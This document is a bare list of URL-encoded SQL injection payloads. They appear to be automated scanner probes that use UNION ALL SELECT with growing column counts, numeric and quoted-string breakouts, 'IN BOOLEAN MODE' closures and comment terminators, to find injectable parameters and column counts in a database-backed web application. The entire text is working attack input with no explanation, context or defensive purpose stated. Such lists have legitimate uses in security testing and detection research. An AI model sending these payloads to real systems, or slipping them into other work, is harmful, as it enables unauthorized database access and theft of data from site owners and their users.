-6644%20%2B%20%28SELECT%208115%20FROM%20DUAL%20WHERE%201257%3D1257%20UNION%20ALL%20SELECT%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%23%20%29 -8715%20%2B%20%28SELECT%206776%20FROM%20DUAL%20WHERE%201972%3D1972%20UNION%20ALL%20SELECT%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%23%20%29 -4872%20%2B%20%28SELECT%202872%20FROM%20DUAL%20WHERE%208815%3D8815%20UNION%20ALL%20SELECT%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%2C%208815%23%20%29 -6123%20%2B%20%28SELECT%207898%20FROM%20DUAL%20WHERE%204143%3D4143%20UNION%20ALL%20SELECT%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%23%20%29 -3740%20%2B%20%28SELECT%203241%20WHERE%206241%3D6241%20UNION%20ALL%20SELECT%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%23%20%29 -8725%20%2B%20%28SELECT%207750%20WHERE%207868%3D7868%20UNION%20ALL%20SELECT%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%23%20%29 -8038%20%2B%20%28SELECT%207466%20WHERE%209131%3D9131%20UNION%20ALL%20SELECT%209131%2C%209131%2C%209131%2C%209131%2C%209131%2C%209131%2C%209131%2C%209131%2C%209131%2C%209131%2C%209131%2C%209131%2C%209131%23%20%29 -6585%20%2B%20%28SELECT%206188%20WHERE%206133%3D6133%20UNION%20ALL%20SELECT%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%23%20%29 -2251%20%2B%20%28SELECT%203629%20WHERE%208564%3D8564%20UNION%20ALL%20SELECT%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%23%20%29 -2648%20%2B%20%28SELECT%203230%20WHERE%206533%3D6533%20UNION%20ALL%20SELECT%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%23%20%29 -7150%20%2B%20%28SELECT%201944%20WHERE%201217%3D1217%20UNION%20ALL%20SELECT%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%23%20%29 -2987%20%2B%20%28SELECT%207693%20WHERE%207202%3D7202%20UNION%20ALL%20SELECT%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%2C%207202%23%20%29 -2295%20%2B%20%28SELECT%208842%20WHERE%206782%3D6782%20UNION%20ALL%20SELECT%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%2C%206782%23%20%29 -3889%20%2B%20%28SELECT%207217%20WHERE%209157%3D9157%20UNION%20ALL%20SELECT%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%23%20%29 -4832%27%20%2B%20%28SELECT%20%27khek%27%20FROM%20DUAL%20WHERE%202940%3D2940%20UNION%20ALL%20SELECT%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%23%20%29%20%2B%20%27 -3451%27%20%2B%20%28SELECT%20%27EmXV%27%20FROM%20DUAL%20WHERE%205815%3D5815%20UNION%20ALL%20SELECT%205815%2C%205815%2C%205815%2C%205815%2C%205815%2C%205815%2C%205815%2C%205815%2C%205815%2C%205815%2C%205815%2C%205815%23%20%29%20%2B%20%27 -6014%27%20%2B%20%28SELECT%20%27FQkX%27%20FROM%20DUAL%20WHERE%205744%3D5744%20UNION%20ALL%20SELECT%205744%2C%205744%2C%205744%2C%205744%2C%205744%2C%205744%2C%205744%2C%205744%2C%205744%2C%205744%2C%205744%2C%205744%2C%205744%23%20%29%20%2B%20%27 -1397%27%20%2B%20%28SELECT%20%27ktLH%27%20FROM%20DUAL%20WHERE%205950%3D5950%20UNION%20ALL%20SELECT%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%23%20%29%20%2B%20%27 -3214%27%20%2B%20%28SELECT%20%27hQWq%27%20FROM%20DUAL%20WHERE%209698%3D9698%20UNION%20ALL%20SELECT%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%23%20%29%20%2B%20%27 -3120%27%20%2B%20%28SELECT%20%27FGWF%27%20FROM%20DUAL%20WHERE%207037%3D7037%20UNION%20ALL%20SELECT%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%2C%207037%23%20%29%20%2B%20%27 -9626%27%20%2B%20%28SELECT%20%27FTsZ%27%20FROM%20DUAL%20WHERE%201180%3D1180%20UNION%20ALL%20SELECT%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%23%20%29%20%2B%20%27 -3666%27%20%2B%20%28SELECT%20%27ISyY%27%20FROM%20DUAL%20WHERE%206740%3D6740%20UNION%20ALL%20SELECT%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%2C%206740%23%20%29%20%2B%20%27 -6663%27%20%2B%20%28SELECT%20%27mBSQ%27%20FROM%20DUAL%20WHERE%202964%3D2964%20UNION%20ALL%20SELECT%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%23%20%29%20%2B%20%27 -6046%27%20%2B%20%28SELECT%20%27Swuu%27%20FROM%20DUAL%20WHERE%204272%3D4272%20UNION%20ALL%20SELECT%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%2C%204272%23%20%29%20%2B%20%27 -8827%27%20%2B%20%28SELECT%20%27TPFs%27%20WHERE%203918%3D3918%20UNION%20ALL%20SELECT%203918%2C%203918%2C%203918%2C%203918%2C%203918%2C%203918%2C%203918%2C%203918%2C%203918%2C%203918%2C%203918%23%20%29%20%2B%20%27 -7464%27%20%2B%20%28SELECT%20%27GLEw%27%20WHERE%205992%3D5992%20UNION%20ALL%20SELECT%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%23%20%29%20%2B%20%27 -3518%27%20%2B%20%28SELECT%20%27APIk%27%20WHERE%208908%3D8908%20UNION%20ALL%20SELECT%208908%2C%208908%2C%208908%2C%208908%2C%208908%2C%208908%2C%208908%2C%208908%2C%208908%2C%208908%2C%208908%2C%208908%2C%208908%23%20%29%20%2B%20%27 -5241%27%20%2B%20%28SELECT%20%27Vuoq%27%20WHERE%205126%3D5126%20UNION%20ALL%20SELECT%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%2C%205126%23%20%29%20%2B%20%27 -7488%27%20%2B%20%28SELECT%20%27Biav%27%20WHERE%207766%3D7766%20UNION%20ALL%20SELECT%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%23%20%29%20%2B%20%27 -1871%27%20%2B%20%28SELECT%20%27umbV%27%20WHERE%202542%3D2542%20UNION%20ALL%20SELECT%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%23%20%29%20%2B%20%27 -2577%27%20%2B%20%28SELECT%20%27dSrt%27%20WHERE%206578%3D6578%20UNION%20ALL%20SELECT%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%2C%206578%23%20%29%20%2B%20%27 -5793%27%20%2B%20%28SELECT%20%27VfCF%27%20WHERE%203182%3D3182%20UNION%20ALL%20SELECT%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%2C%203182%23%20%29%20%2B%20%27 -1811%27%20%2B%20%28SELECT%20%27PPxH%27%20WHERE%206399%3D6399%20UNION%20ALL%20SELECT%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%23%20%29%20%2B%20%27 -8422%27%20%2B%20%28SELECT%20%27GgWL%27%20WHERE%201436%3D1436%20UNION%20ALL%20SELECT%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%23%20%29%20%2B%20%27 -8077%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%23%20%23 -2985%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206707%2C%206707%2C%206707%2C%206707%2C%206707%2C%206707%2C%206707%2C%206707%2C%206707%2C%206707%2C%206707%2C%206707%23%20%23 -9604%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%23%20%23 -9070%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%2C%205580%23%20%23 -9377%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%2C%203394%23%20%23 -8134%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%2C%209835%23%20%23 -4640%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%2C%206840%23%20%23 -1109%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%2C%203057%23%20%23 -8300%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%2C%206680%23%20%23 -7970%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%23%20%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 